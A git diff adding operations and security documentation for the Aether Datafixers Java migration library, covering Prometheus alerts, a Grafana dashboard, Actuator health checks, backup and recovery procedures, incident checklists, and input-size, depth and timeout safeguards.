description: "Zero successful migrations with active failures. Immediate attention required." 
+ runbook_url: "https://docs.example.com/runbooks/datafixer-total-failure" + + - name: aether-datafixers-warning + rules: + # Elevated failure rate + - alert: DataFixerElevatedFailureRate + expr: | + ( + sum(rate(aether_datafixers_migrations_failure_total[5m])) by (domain) + / ( + sum(rate(aether_datafixers_migrations_success_total[5m])) by (domain) + + sum(rate(aether_datafixers_migrations_failure_total[5m])) by (domain) + ) + ) > 0.01 + for: 5m + labels: + severity: warning + annotations: + summary: "Warning: DataFixer failure rate > 1% in domain {{ $labels.domain }}" + description: "Failure rate is {{ $value | humanizePercentage }}. Investigate soon." + + # Slow migrations (p95) + - alert: DataFixerSlowMigrations + expr: | + histogram_quantile(0.95, + sum(rate(aether_datafixers_migrations_duration_seconds_bucket[5m])) by (le, domain) + ) > 1 + for: 5m + labels: + severity: warning + annotations: + summary: "Warning: Slow migrations in domain {{ $labels.domain }}" + description: "p95 migration duration is {{ $value | humanizeDuration }}. Review performance." + + # Very slow migrations (p99) + - alert: DataFixerVerySlowMigrations + expr: | + histogram_quantile(0.99, + sum(rate(aether_datafixers_migrations_duration_seconds_bucket[5m])) by (le, domain) + ) > 5 + for: 5m + labels: + severity: warning + annotations: + summary: "Warning: Very slow migrations in domain {{ $labels.domain }}" + description: "p99 migration duration is {{ $value | humanizeDuration }}. Profile and optimize." + + - name: aether-datafixers-info + rules: + # Large version span + - alert: DataFixerLargeVersionSpan + expr: | + ( + rate(aether_datafixers_migrations_version_span_sum[1h]) + / rate(aether_datafixers_migrations_version_span_count[1h]) + ) > 50 + for: 1h + labels: + severity: info + annotations: + summary: "Info: Large version span in domain {{ $labels.domain }}" + description: "Average span is {{ $value }} versions. Consider data freshness review." + + # No migration activity + - alert: DataFixerNoActivity + expr: | + sum(rate(aether_datafixers_migrations_success_total[1h])) by (domain) == 0 + and sum(rate(aether_datafixers_migrations_failure_total[1h])) by (domain) == 0 + for: 1h + labels: + severity: info + annotations: + summary: "Info: No migration activity in domain {{ $labels.domain }}" + description: "No migrations in the last hour. Verify this is expected." 
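+      # Optional (a sketch, not part of the reference configuration): the
+      # failure-ratio expression above is repeated across several alerts; a
+      # recording rule can precompute it once per domain and keep alert rules
+      # short. The record name below is a suggestion:
+      #
+      # - record: aether:datafixers:failure_ratio_5m
+      #   expr: |
+      #     sum(rate(aether_datafixers_migrations_failure_total[5m])) by (domain)
+      #     / (
+      #       sum(rate(aether_datafixers_migrations_success_total[5m])) by (domain)
+      #       + sum(rate(aether_datafixers_migrations_failure_total[5m])) by (domain)
+      #     )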
+``` + +--- + +## Grafana Dashboard + +### Complete Dashboard JSON + +```json +{ + "title": "Aether DataFixers Operations", + "uid": "aether-datafixers-ops", + "tags": ["aether", "datafixers", "migrations"], + "timezone": "browser", + "refresh": "30s", + "panels": [ + { + "title": "Migration Rate", + "type": "timeseries", + "gridPos": {"h": 8, "w": 12, "x": 0, "y": 0}, + "targets": [ + { + "expr": "sum(rate(aether_datafixers_migrations_success_total[5m])) by (domain)", + "legendFormat": "Success ({{domain}})" + }, + { + "expr": "sum(rate(aether_datafixers_migrations_failure_total[5m])) by (domain)", + "legendFormat": "Failure ({{domain}})" + } + ], + "fieldConfig": { + "defaults": { + "unit": "ops" + } + } + }, + { + "title": "Success Rate", + "type": "gauge", + "gridPos": {"h": 8, "w": 6, "x": 12, "y": 0}, + "targets": [ + { + "expr": "(sum(rate(aether_datafixers_migrations_success_total[1h])) / (sum(rate(aether_datafixers_migrations_success_total[1h])) + sum(rate(aether_datafixers_migrations_failure_total[1h])))) * 100" + } + ], + "fieldConfig": { + "defaults": { + "unit": "percent", + "min": 0, + "max": 100, + "thresholds": { + "steps": [ + {"color": "red", "value": 0}, + {"color": "yellow", "value": 95}, + {"color": "green", "value": 99} + ] + } + } + } + }, + { + "title": "Current Error Rate", + "type": "stat", + "gridPos": {"h": 8, "w": 6, "x": 18, "y": 0}, + "targets": [ + { + "expr": "sum(rate(aether_datafixers_migrations_failure_total[5m])) / (sum(rate(aether_datafixers_migrations_success_total[5m])) + sum(rate(aether_datafixers_migrations_failure_total[5m]))) * 100" + } + ], + "fieldConfig": { + "defaults": { + "unit": "percent", + "thresholds": { + "steps": [ + {"color": "green", "value": 0}, + {"color": "yellow", "value": 1}, + {"color": "red", "value": 5} + ] + } + } + } + }, + { + "title": "Migration Duration Percentiles", + "type": "timeseries", + "gridPos": {"h": 8, "w": 12, "x": 0, "y": 8}, + "targets": [ + { + "expr": "histogram_quantile(0.50, sum(rate(aether_datafixers_migrations_duration_seconds_bucket[5m])) by (le, domain))", + "legendFormat": "p50 ({{domain}})" + }, + { + "expr": "histogram_quantile(0.95, sum(rate(aether_datafixers_migrations_duration_seconds_bucket[5m])) by (le, domain))", + "legendFormat": "p95 ({{domain}})" + }, + { + "expr": "histogram_quantile(0.99, sum(rate(aether_datafixers_migrations_duration_seconds_bucket[5m])) by (le, domain))", + "legendFormat": "p99 ({{domain}})" + } + ], + "fieldConfig": { + "defaults": { + "unit": "s" + } + } + }, + { + "title": "Version Span Distribution", + "type": "timeseries", + "gridPos": {"h": 8, "w": 12, "x": 12, "y": 8}, + "targets": [ + { + "expr": "rate(aether_datafixers_migrations_version_span_sum[5m]) / rate(aether_datafixers_migrations_version_span_count[5m])", + "legendFormat": "Avg Span ({{domain}})" + }, + { + "expr": "aether_datafixers_migrations_version_span_max", + "legendFormat": "Max Span ({{domain}})" + } + ] + }, + { + "title": "Failures by Error Type", + "type": "piechart", + "gridPos": {"h": 8, "w": 8, "x": 0, "y": 16}, + "targets": [ + { + "expr": "sum(increase(aether_datafixers_migrations_failure_total[24h])) by (error_type)", + "legendFormat": "{{error_type}}" + } + ] + }, + { + "title": "Failure Rate by Domain", + "type": "timeseries", + "gridPos": {"h": 8, "w": 8, "x": 8, "y": 16}, + "targets": [ + { + "expr": "sum(rate(aether_datafixers_migrations_failure_total[5m])) by (domain)", + "legendFormat": "{{domain}}" + } + ], + "fieldConfig": { + "defaults": { + "unit": "ops" + } + } + }, + { + 
"title": "Recent Errors (Last 1h)", + "type": "table", + "gridPos": {"h": 8, "w": 8, "x": 16, "y": 16}, + "targets": [ + { + "expr": "sum(increase(aether_datafixers_migrations_failure_total[1h])) by (domain, error_type) > 0", + "format": "table", + "instant": true + } + ], + "transformations": [ + { + "id": "organize", + "options": { + "renameByName": { + "domain": "Domain", + "error_type": "Error Type", + "Value": "Count" + } + } + } + ] + } + ] +} +``` + +### Dashboard Import + +1. Go to Grafana > Dashboards > Import +2. Paste the JSON above +3. Select your Prometheus data source +4. Click Import + +--- + +## Actuator Integration + +### Health Endpoint + +The DataFixer health indicator reports UP/DOWN status per domain. + +**Request:** +```bash +curl http://localhost:8080/actuator/health +``` + +**Response:** +```json +{ + "status": "UP", + "components": { + "datafixer": { + "status": "UP", + "details": { + "totalDomains": 2, + "default.status": "UP", + "default.currentVersion": 200, + "game.status": "UP", + "game.currentVersion": 150 + } + } + } +} +``` + +### Custom Endpoint + +Get detailed DataFixer information at `/actuator/datafixers`: + +```bash +curl http://localhost:8080/actuator/datafixers +``` + +```json +{ + "domains": { + "default": { + "currentVersion": 200, + "status": "UP" + }, + "game": { + "currentVersion": 150, + "status": "UP" + } + } +} +``` + +### Kubernetes Probes + +```yaml +apiVersion: v1 +kind: Pod +spec: + containers: + - name: app + livenessProbe: + httpGet: + path: /actuator/health/liveness + port: 8080 + initialDelaySeconds: 30 + periodSeconds: 10 + failureThreshold: 3 + + readinessProbe: + httpGet: + path: /actuator/health/readiness + port: 8080 + initialDelaySeconds: 10 + periodSeconds: 5 + failureThreshold: 3 + + startupProbe: + httpGet: + path: /actuator/health + port: 8080 + initialDelaySeconds: 5 + periodSeconds: 5 + failureThreshold: 30 +``` + +### Prometheus Scraping Actuator + +```yaml +# prometheus.yml +scrape_configs: + - job_name: 'spring-actuator' + metrics_path: '/actuator/prometheus' + static_configs: + - targets: ['app:8080'] + scrape_interval: 15s +``` + +--- + +## Multi-Domain Monitoring + +### Per-Domain Dashboards + +Use Grafana variables to filter by domain: + +```json +{ + "templating": { + "list": [ + { + "name": "domain", + "type": "query", + "query": "label_values(aether_datafixers_migrations_success_total, domain)", + "refresh": 2 + } + ] + } +} +``` + +Then use `domain=~\"$domain\"` in queries: + +```promql +sum(rate(aether_datafixers_migrations_success_total{domain=~"$domain"}[5m])) +``` + +### Cross-Domain Comparison + +Compare performance across domains: + +```promql +# Success rate by domain +( + sum(rate(aether_datafixers_migrations_success_total[1h])) by (domain) + / ( + sum(rate(aether_datafixers_migrations_success_total[1h])) by (domain) + + sum(rate(aether_datafixers_migrations_failure_total[1h])) by (domain) + ) +) * 100 +``` + +--- + +## PagerDuty Integration + +### Alertmanager Configuration + +```yaml +# alertmanager.yml +global: + pagerduty_url: 'https://events.pagerduty.com/v2/enqueue' + +route: + receiver: 'default' + routes: + - match: + severity: critical + receiver: 'pagerduty-critical' + - match: + severity: warning + receiver: 'slack-warning' + +receivers: + - name: 'default' + email_configs: + - to: 'team@example.com' + + - name: 'pagerduty-critical' + pagerduty_configs: + - service_key: '' + description: '{{ .CommonAnnotations.summary }}' + details: + runbook: '{{ .CommonAnnotations.runbook_url }}' + domain: 
'{{ .CommonLabels.domain }}' + + - name: 'slack-warning' + slack_configs: + - api_url: '' + channel: '#alerts' + title: '{{ .CommonAnnotations.summary }}' + text: '{{ .CommonAnnotations.description }}' +``` + +--- + +## Application Configuration + +### Enable Metrics + +```yaml +# application.yml +aether: + datafixers: + enabled: true + metrics: + timing: true + counting: true + +management: + endpoints: + web: + exposure: + include: health, info, prometheus, datafixers + metrics: + export: + prometheus: + enabled: true + endpoint: + health: + show-details: always +``` + +### Custom Metrics Extension + +```java +@Component +public class ExtendedMigrationMetrics extends MigrationMetrics { + + private final Counter largeSpanCounter; + + public ExtendedMigrationMetrics(MeterRegistry registry) { + super(registry); + this.largeSpanCounter = Counter.builder("aether.datafixers.migrations.large_span") + .description("Migrations with version span > 100") + .register(registry); + } + + @Override + public void recordSuccess(String domain, int fromVersion, int toVersion, Duration duration) { + super.recordSuccess(domain, fromVersion, toVersion, duration); + + // Track large version spans separately + if (Math.abs(toVersion - fromVersion) > 100) { + largeSpanCounter.increment(); + } + } +} +``` + +--- + +## Related + +- [Spring Boot Metrics](../spring-boot/metrics.md) — Complete metrics reference +- [Spring Boot Actuator](../spring-boot/actuator.md) — Actuator integration +- [Debugging Guide](debugging-guide.md) — Diagnosing issues +- [Recovery Procedures](recovery-procedures.md) — Responding to alerts diff --git a/docs/operations/recovery-procedures.md b/docs/operations/recovery-procedures.md new file mode 100644 index 0000000..43b5eac --- /dev/null +++ b/docs/operations/recovery-procedures.md @@ -0,0 +1,583 @@ +# Recovery Procedures + +How to recover from migration failures, data issues, and production incidents. + +## Quick Reference + +| Scenario | Procedure | Complexity | +|--------------------------|------------------------|------------| +| Single record failure | Retry with diagnostics | Low | +| Batch failure (< 5%) | Isolate and retry | Medium | +| High failure rate (> 5%) | Stop, investigate, fix | High | +| Data corruption | Restore from backup | High | +| Schema mismatch | Version alignment | Medium | + +--- + +## Backup Recommendations + +### Pre-Migration Backup Strategy + +**Before major version bumps:** +1. Create full database backup +2. Verify backup integrity (test restore) +3. Document current schema version +4. Keep backup for rollback window (e.g., 7 days) + +**Before routine operations:** +1. Enable point-in-time recovery +2. Verify incremental backups are current +3. 
Document migration batch parameters
+
+### Backup Checklist
+
+```markdown
+## Pre-Migration Backup Checklist
+
+- [ ] Database backup completed
+- [ ] Backup verified (test restore on staging)
+- [ ] Backup retention policy confirmed
+- [ ] Schema version documented in backup metadata
+- [ ] Rollback procedure documented
+- [ ] Team notified of migration window
+```
+
+### Database Backup Patterns
+
+**PostgreSQL:**
+```bash
+# Full backup before migration
+pg_dump -Fc -f backup_v100_$(date +%Y%m%d).dump mydb
+
+# With version in filename
+pg_dump -Fc -f backup_schema_v100_to_v200_$(date +%Y%m%d_%H%M%S).dump mydb
+```
+
+**MongoDB:**
+```bash
+# Full backup
+mongodump --db mydb --out ./backup_v100_$(date +%Y%m%d)
+
+# Specific collection
+mongodump --db mydb --collection players --out ./backup_players_v100
+```
+
+### Application-Level Snapshots
+
+```java
+// Create a pre-migration snapshot for critical records
+public void createMigrationSnapshot(List<String> recordIds) throws IOException {
+    Path snapshotDir = Path.of("snapshots",
+        "migration_" + System.currentTimeMillis());
+    Files.createDirectories(snapshotDir);
+
+    for (String id : recordIds) {
+        Dynamic<?> data = loadRecord(id);
+        Path file = snapshotDir.resolve(id + ".json");
+        Files.writeString(file, serializeToJson(data));
+    }
+
+    logger.info("Created snapshot of {} records at {}",
+        recordIds.size(), snapshotDir);
+}
+```
+
+---
+
+## Partial Migration Recovery
+
+### Detecting Partial Migrations
+
+**Symptoms:**
+- Some records at the old version, some at the new version
+- Inconsistent data across related entities
+- `aether.datafixers.migrations.failure` spike followed by recovery
+
+**Detection Query (SQL):**
+```sql
+-- Find version distribution
+SELECT data_version, COUNT(*) as count
+FROM entities
+WHERE type = 'player'
+GROUP BY data_version
+ORDER BY data_version;
+
+-- Find records still at the old version
+SELECT id, data_version, updated_at
+FROM entities
+WHERE type = 'player'
+  AND data_version < 200
+ORDER BY updated_at DESC;
+```
+
+**Detection Query (MongoDB):**
+```javascript
+// Version distribution
+db.entities.aggregate([
+    { $match: { type: "player" } },
+    { $group: { _id: "$dataVersion", count: { $sum: 1 } } },
+    { $sort: { _id: 1 } }
+]);
+
+// Records at the old version
+db.entities.find({
+    type: "player",
+    dataVersion: { $lt: 200 }
+}).sort({ updatedAt: -1 });
+```
+
+### Recovery Option 1: Retry Failed Records
+
+Best for: Small numbers of failures, transient errors.
+
+```java
+public class MigrationRetryService {
+
+    private final AetherDataFixer fixer;
+    private final Logger logger = LoggerFactory.getLogger(getClass());
+
+    public void retryFailedRecords(List<String> failedIds, int targetVersion) {
+        int success = 0;
+        int failed = 0;
+
+        for (String id : failedIds) {
+            try {
+                // Load record
+                Dynamic<?> data = loadRecord(id);
+                int currentVersion = extractVersion(data);
+
+                // Skip if already migrated
+                if (currentVersion >= targetVersion) {
+                    logger.info("Record {} already at version {}", id, currentVersion);
+                    continue;
+                }
+
+                // Enable diagnostics for the retry
+                DiagnosticContext ctx = DiagnosticContext.create(
+                    DiagnosticOptions.builder()
+                        .captureSnapshots(true)
+                        .build()
+                );
+
+                // Retry migration
+                Dynamic<?> result = fixer.update(
+                    TypeReferences.PLAYER,
+                    data,
+                    new DataVersion(currentVersion),
+                    new DataVersion(targetVersion),
+                    ctx
+                );
+
+                // Save result
+                saveRecord(id, result);
+                success++;
+
+            } catch (DataFixerException e) {
+                failed++;
+                logger.error("Retry failed for record {}: {} [{}]",
+                    id, e.getMessage(), e.getContext());
+            }
+        }
+
+        logger.info("Retry complete: {} success, {} failed", success, failed);
+    }
+}
+```
+
+### Recovery Option 2: Isolate and Skip
+
+Best for: Specific data patterns causing failures.
+
+```java
+public class MigrationIsolationService {
+
+    public void migrateWithIsolation(Stream<Dynamic<?>> records, int targetVersion) {
+        List<String> quarantined = new ArrayList<>();
+
+        records.forEach(data -> {
+            String id = extractId(data);
+            try {
+                Dynamic<?> result = fixer.update(
+                    TypeReferences.PLAYER,
+                    data,
+                    new DataVersion(extractVersion(data)),
+                    new DataVersion(targetVersion)
+                );
+                saveRecord(id, result);
+            } catch (DataFixerException e) {
+                // Quarantine the failed record
+                quarantined.add(id);
+                saveToQuarantine(id, data, e);
+                logger.warn("Quarantined record {}: {}", id, e.getMessage());
+            }
+        });
+
+        if (!quarantined.isEmpty()) {
+            logger.warn("Migration complete with {} quarantined records", quarantined.size());
+            notifyTeam(quarantined);
+        }
+    }
+
+    private void saveToQuarantine(String id, Dynamic<?> data, DataFixerException e) {
+        // Save to a quarantine table/collection for manual review
+        QuarantineRecord record = new QuarantineRecord(
+            id,
+            serializeToJson(data),
+            e.getClass().getSimpleName(),
+            e.getMessage(),
+            e.getContext(),
+            Instant.now()
+        );
+        quarantineRepository.save(record);
+    }
+}
+```
+
+### Recovery Option 3: Manual Intervention
+
+Best for: Complex data issues requiring human judgment.
+
+```java
+public class ManualRecoveryService {
+
+    public void exportForManualReview(List<String> recordIds) throws IOException {
+        Path exportDir = Path.of("manual_review",
+            LocalDate.now().toString());
+        Files.createDirectories(exportDir);
+
+        for (String id : recordIds) {
+            Dynamic<?> data = loadRecord(id);
+
+            // Export with metadata
+            Map<String, Object> export = new LinkedHashMap<>();
+            export.put("id", id);
+            export.put("currentVersion", extractVersion(data));
+            export.put("targetVersion", CURRENT_VERSION);
+            export.put("data", data.getValue());
+            export.put("exportedAt", Instant.now().toString());
+
+            Path file = exportDir.resolve(id + ".json");
+            Files.writeString(file, prettyJson(export));
+        }
+
+        logger.info("Exported {} records to {} for manual review",
+            recordIds.size(), exportDir);
+    }
+
+    public void importManualFixes(Path fixesDir) throws IOException {
+        try (Stream<Path> files = Files.list(fixesDir)) {
+            files.filter(p -> p.toString().endsWith(".json"))
+                .forEach(file -> {
+                    try {
+                        Map<String, Object> fixed = parseJson(Files.readString(file));
+                        String id = (String) fixed.get("id");
+                        Object data = fixed.get("data");
+                        int version = ((Number) fixed.get("fixedVersion")).intValue();
+
+                        saveRecord(id, createDynamic(data, version));
+                        logger.info("Imported manual fix for record {}", id);
+                    } catch (Exception e) {
+                        logger.error("Failed to import {}: {}", file, e.getMessage());
+                    }
+                });
+        }
+    }
+}
+```
+
+---
+
+## Rollback Strategies
+
+### Important: Forward-Only Design
+
+Aether Datafixers is designed for **forward migration only**. True rollback requires:
+
+1. **Restore from backup** (recommended)
+2. **Write compensating fixes** (complex, not recommended)
+
+### Restore from Backup
+
+**Full Restore:**
+
+```bash
+# PostgreSQL
+pg_restore -d mydb backup_v100_20240115.dump
+
+# MongoDB
+mongorestore --db mydb ./backup_v100_20240115/mydb
+```
+
+**Selective Restore (specific records):**
+
+```sql
+-- PostgreSQL: Restore specific records from backup
+-- 1. Create a temporary schema, then restore into it (pg_restore runs from the shell):
+CREATE SCHEMA backup_restore;
+-- $ pg_restore -d mydb -n backup_restore backup_v100.dump
+
+-- 2. Copy specific records
+INSERT INTO entities (id, type, data, data_version)
+SELECT id, type, data, data_version
+FROM backup_restore.entities
+WHERE id IN ('record1', 'record2', 'record3')
+ON CONFLICT (id) DO UPDATE
+SET data = EXCLUDED.data, data_version = EXCLUDED.data_version;
+
+-- 3. Clean up
+DROP SCHEMA backup_restore CASCADE;
+```
+
+### Compensating Fixes (Advanced)
+
+Only use this when a backup is unavailable and you understand the exact transformations to reverse.
+
+```java
+// Example: Reverse a field rename (name -> displayName back to name)
+public class ReverseRenameDisplayNameFix extends SchemaDataFix {
+
+    public ReverseRenameDisplayNameFix(Schema inputSchema, Schema outputSchema) {
+        super("reverse_rename_display_name", inputSchema, outputSchema);
+    }
+
+    @Override
+    protected TypeRewriteRule makeRule(Schema inputSchema, Schema outputSchema) {
+        return Rules.renameField(
+            TypeReferences.PLAYER,
+            "displayName",  // current name
+            "name"          // original name
+        );
+    }
+}
+```
+
+**Warning:** Compensating fixes are error-prone. Prefer backup restoration.
+
+---
+
+## Error Recovery Workflows
+
+### Workflow 1: FixException Recovery
+
+```
+1. Extract exception context
+   └─ Get fixName, fromVersion, toVersion, typeReference
+
+2. Enable DiagnosticContext
+   └─ captureSnapshots(true), captureRuleDetails(true)
+
+3. Reproduce with single record
+   └─ Run migration on isolated test record
+
+4.
Analyze MigrationReport + └─ Check fix.beforeSnapshot vs fix.afterSnapshot + └─ Find exact rule that failed + +5. Identify root cause + ├─ Missing field? → Check input data + ├─ Wrong type? → Check codec/schema + └─ Logic error? → Check fix implementation + +6. Fix data or code + ├─ Data issue → Clean/transform data + └─ Code issue → Deploy fix, redeploy + +7. Retry migration + └─ Process failed records +``` + +### Workflow 2: DecodeException Recovery + +``` +1. Get path from exception + └─ e.getPath() returns "player.inventory[0].item" + +2. Navigate to problematic field + └─ Use path to find exact location in data + +3. Determine expected vs actual type + └─ Check schema definition + └─ Compare with actual data + +4. Clean/transform data + ├─ Missing field? → Add default value + ├─ Wrong type? → Convert or remove + └─ Malformed? → Parse and fix + +5. Retry migration +``` + +### Workflow 3: RegistryException Recovery + +``` +1. Check missing type/version + └─ e.getMissingType() or e.getMissingVersion() + +2. Verify bootstrap registration + └─ Check DataFixerBootstrap implementation + +3. Check version chain completeness + └─ Ensure no gaps in version sequence + +4. Add missing registrations + └─ Register missing type or schema + +5. Redeploy and retry +``` + +--- + +## Incident Response + +### Severity Levels + +| Level | Criteria | Response Time | Escalation | +|-------|----------|---------------|------------| +| P1 | All migrations failing | Immediate | On-call + Lead + Manager | +| P2 | > 5% failure rate | 15 min | On-call + Lead | +| P3 | > 1% failure rate | 1 hour | On-call | +| P4 | Isolated failures | 4 hours | Next business day | + +### Incident Response Checklist + +#### Initial Response (0-5 min) + +```markdown +## Initial Response Checklist + +- [ ] Acknowledge alert +- [ ] Check metrics dashboard + - Current failure rate + - Error type breakdown + - Affected domains +- [ ] Review recent deployments (last 24h) +- [ ] Check actuator health endpoint +- [ ] Initial assessment posted to incident channel +``` + +#### Investigation (5-30 min) + +```markdown +## Investigation Checklist + +- [ ] Enable DEBUG logging for de.splatgames.aether.datafixers +- [ ] Capture sample failures (3-5 records) +- [ ] Enable DiagnosticContext on sample records +- [ ] Analyze MigrationReport for patterns +- [ ] Check database/storage health +- [ ] Check upstream service health +- [ ] Root cause hypothesis documented +``` + +#### Resolution + +```markdown +## Resolution Checklist + +- [ ] Root cause confirmed +- [ ] Fix identified + - [ ] Data fix (transformation/cleanup) + - [ ] Code fix (bug fix) + - [ ] Configuration fix (settings change) +- [ ] Fix tested in staging +- [ ] Fix deployed to production +- [ ] Metrics returning to normal +- [ ] Failed records reprocessed +``` + +#### Post-Incident + +```markdown +## Post-Incident Checklist + +- [ ] Timeline documented +- [ ] Root cause analysis complete +- [ ] Post-mortem scheduled (within 48h) +- [ ] Runbook updated if needed +- [ ] Preventive measures identified +- [ ] Follow-up tasks created +``` + +--- + +## Data Validation After Recovery + +### Consistency Checks + +```sql +-- Check for version consistency +SELECT + type, + MIN(data_version) as min_version, + MAX(data_version) as max_version, + COUNT(*) as count +FROM entities +GROUP BY type; + +-- Check for orphaned references +SELECT e.id, e.type +FROM entities e +LEFT JOIN entities parent ON e.parent_id = parent.id +WHERE e.parent_id IS NOT NULL AND parent.id IS NULL; +``` + +### Version 
Alignment
+
+```java
+public void verifyVersionAlignment(int expectedVersion) {
+    // Count records at the wrong version
+    long wrongVersion = entityRepository.countByDataVersionNot(expectedVersion);
+
+    if (wrongVersion > 0) {
+        logger.error("Found {} records at wrong version (expected {})",
+            wrongVersion, expectedVersion);
+
+        // List samples
+        List<Entity> samples = entityRepository
+            .findByDataVersionNot(expectedVersion, PageRequest.of(0, 10));
+
+        for (Entity e : samples) {
+            logger.error("  {} at version {} (expected {})",
+                e.getId(), e.getDataVersion(), expectedVersion);
+        }
+    } else {
+        logger.info("All records at expected version {}", expectedVersion);
+    }
+}
+```
+
+### Functional Verification
+
+```java
+@Test
+void verifyMigrationSuccess() {
+    // Load sample migrated records
+    List<Entity> samples = entityRepository.findRandomSample(100);
+
+    for (Entity entity : samples) {
+        // Verify the record can be decoded at the current version
+        assertDoesNotThrow(() -> {
+            Typed<?> typed = fixer.decode(
+                CURRENT_VERSION,
+                entity.getTypeReference(),
+                entity.getData()
+            );
+            assertNotNull(typed.getValue());
+        }, "Failed to decode entity " + entity.getId());
+
+        // Verify key fields are present
+        Dynamic<?> data = entity.getData();
+        assertTrue(data.get("id").asString().result().isPresent());
+        assertTrue(data.get("_version").asNumber().result().isPresent());
+    }
+}
+```
+
+---
+
+## Related
+
+- [Error Scenarios](error-scenarios.md) — Exception handling reference
+- [Debugging Guide](debugging-guide.md) — Diagnosing issues
+- [Monitoring & Alerting](monitoring-alerting.md) — Detecting problems
+- [Troubleshooting](../troubleshooting/index.md) — Quick fixes
diff --git a/docs/security/best-practices.md b/docs/security/best-practices.md
new file mode 100644
index 0000000..dc04f4a
--- /dev/null
+++ b/docs/security/best-practices.md
@@ -0,0 +1,492 @@
+# Security Best Practices
+
+This document provides general security best practices for processing untrusted data with Aether Datafixers. These practices apply across all serialization formats.
+
+## Defense in Depth
+
+Security should be implemented in layers. No single control is sufficient, so combine multiple measures:
+
+1. **Input Validation** — Check size and format before parsing
+2. **Safe Parser Configuration** — Use security-hardened parser settings
+3. **Resource Limits** — Enforce depth, size, and time limits
+4. **Monitoring** — Log and alert on suspicious activity
+5. **Sandboxing** — Isolate high-risk processing
+
+---
+
+## Input Validation Before Migration
+
+### Size Validation
+
+Always validate input size before parsing:
+
+```java
+public class InputValidator {
+
+    private static final long MAX_PAYLOAD_SIZE = 10 * 1024 * 1024; // 10MB
+
+    public void validateSize(byte[] input) {
+        if (input == null) {
+            throw new IllegalArgumentException("Input cannot be null");
+        }
+        if (input.length > MAX_PAYLOAD_SIZE) {
+            throw new PayloadTooLargeException(
+                "Payload size " + input.length + " exceeds maximum " + MAX_PAYLOAD_SIZE);
+        }
+    }
+
+    public void validateSize(String input) {
+        if (input == null) {
+            throw new IllegalArgumentException("Input cannot be null");
+        }
+        if (input.length() > MAX_PAYLOAD_SIZE) {
+            throw new PayloadTooLargeException(
+                "Payload size " + input.length() + " exceeds maximum " + MAX_PAYLOAD_SIZE);
+        }
+    }
+
+    public void validateSize(InputStream input, long contentLength) {
+        if (contentLength > MAX_PAYLOAD_SIZE) {
+            throw new PayloadTooLargeException(
+                "Content-Length " + contentLength + " exceeds maximum " + MAX_PAYLOAD_SIZE);
+        }
+    }
+}
+```
+
+### Size-Limited InputStream
+
+For streaming scenarios, wrap the input stream:
+
+```java
+public class SizeLimitedInputStream extends FilterInputStream {
+
+    private final long maxSize;
+    private long bytesRead = 0;
+
+    public SizeLimitedInputStream(InputStream in, long maxSize) {
+        super(in);
+        this.maxSize = maxSize;
+    }
+
+    @Override
+    public int read() throws IOException {
+        int b = super.read();
+        if (b != -1) {
+            bytesRead++;
+            checkLimit();
+        }
+        return b;
+    }
+
+    @Override
+    public int read(byte[] b, int off, int len) throws IOException {
+        int n = super.read(b, off, len);
+        if (n > 0) {
+            bytesRead += n;
+            checkLimit();
+        }
+        return n;
+    }
+
+    private void checkLimit() throws IOException {
+        if (bytesRead > maxSize) {
+            throw new IOException("Input exceeds maximum size of " + maxSize + " bytes");
+        }
+    }
+}
+
+// Usage
+InputStream limited = new SizeLimitedInputStream(userInput, 10 * 1024 * 1024);
+Object data = yaml.load(limited);
+```
+
+---
+
+## Depth and Nesting Limits
+
+Deep nesting can cause stack overflow or excessive memory consumption.
+
+### Parser-Level Limits (Preferred)
+
+Use built-in parser limits when available:
+
+```java
+// Jackson
+StreamReadConstraints constraints = StreamReadConstraints.builder()
+    .maxNestingDepth(50)
+    .build();
+
+// SnakeYAML
+LoaderOptions options = new LoaderOptions();
+options.setNestingDepthLimit(50);
+```
+
+### Application-Level Validation
+
+For parsers without built-in limits, validate after parsing:
+
+```java
+public class DepthValidator {
+
+    private static final int MAX_DEPTH = 50;
+
+    public void validateDepth(Dynamic<?> dynamic) {
+        validateDepth(dynamic, 0);
+    }
+
+    private void validateDepth(Dynamic<?> dynamic, int depth) {
+        if (depth > MAX_DEPTH) {
+            throw new SecurityException("Data exceeds maximum depth of " + MAX_DEPTH);
+        }
+
+        // Check map entries
+        dynamic.getMap().result().ifPresent(map -> {
+            map.values().forEach(value -> validateDepth(value, depth + 1));
+        });
+
+        // Check list elements
+        dynamic.getList().result().ifPresent(list -> {
+            list.forEach(element -> validateDepth(element, depth + 1));
+        });
+    }
+}
+```
+
+---
+
+## Timeout Configuration
+
+Long-running migrations can be exploited for DoS. Implement timeouts:
+
+```java
+import java.util.concurrent.*;
+
+public class TimedMigrationService {
+
+    private final AetherDataFixer fixer;
+    private final ExecutorService executor;
+    private final Duration timeout;
+
+    public TimedMigrationService(AetherDataFixer fixer, Duration timeout) {
+        this.fixer = fixer;
+        this.executor = Executors.newCachedThreadPool();
+        this.timeout = timeout;
+    }
+
+    public <T> TaggedDynamic<T> migrateWithTimeout(
+            TaggedDynamic<T> input,
+            DataVersion from,
+            DataVersion to) throws TimeoutException {
+
+        Future<TaggedDynamic<T>> future = executor.submit(
+            () -> fixer.update(input, from, to)
+        );
+
+        try {
+            return future.get(timeout.toMillis(), TimeUnit.MILLISECONDS);
+        } catch (TimeoutException e) {
+            future.cancel(true);
+            throw new MigrationTimeoutException(
+                "Migration timed out after " + timeout, e);
+        } catch (InterruptedException e) {
+            Thread.currentThread().interrupt();
+            throw new MigrationException("Migration interrupted", e);
+        } catch (ExecutionException e) {
+            throw new MigrationException("Migration failed", e.getCause());
+        }
+    }
+
+    public void shutdown() {
+        executor.shutdown();
+    }
+}
+```
+
+### Virtual Threads (Java 21+)
+
+With Java 21+, use virtual threads for better resource efficiency:
+
+```java
+public class VirtualThreadMigrationService {
+
+    private final AetherDataFixer fixer;
+    private final Duration timeout;
+
+    public VirtualThreadMigrationService(AetherDataFixer fixer, Duration timeout) {
+        this.fixer = fixer;
+        this.timeout = timeout;
+    }
+
+    public <T> TaggedDynamic<T> migrateWithTimeout(
+            TaggedDynamic<T> input,
+            DataVersion from,
+            DataVersion to) throws TimeoutException {
+
+        try (var executor = Executors.newVirtualThreadPerTaskExecutor()) {
+            Future<TaggedDynamic<T>> future = executor.submit(
+                () -> fixer.update(input, from, to)
+            );
+            try {
+                return future.get(timeout.toMillis(), TimeUnit.MILLISECONDS);
+            } catch (TimeoutException e) {
+                // Cancel so executor.close() does not block on the abandoned task
+                future.cancel(true);
+                throw new MigrationTimeoutException("Migration timed out", e);
+            } catch (Exception e) {
+                throw new MigrationException("Migration failed", e);
+            }
+        }
+    }
+}
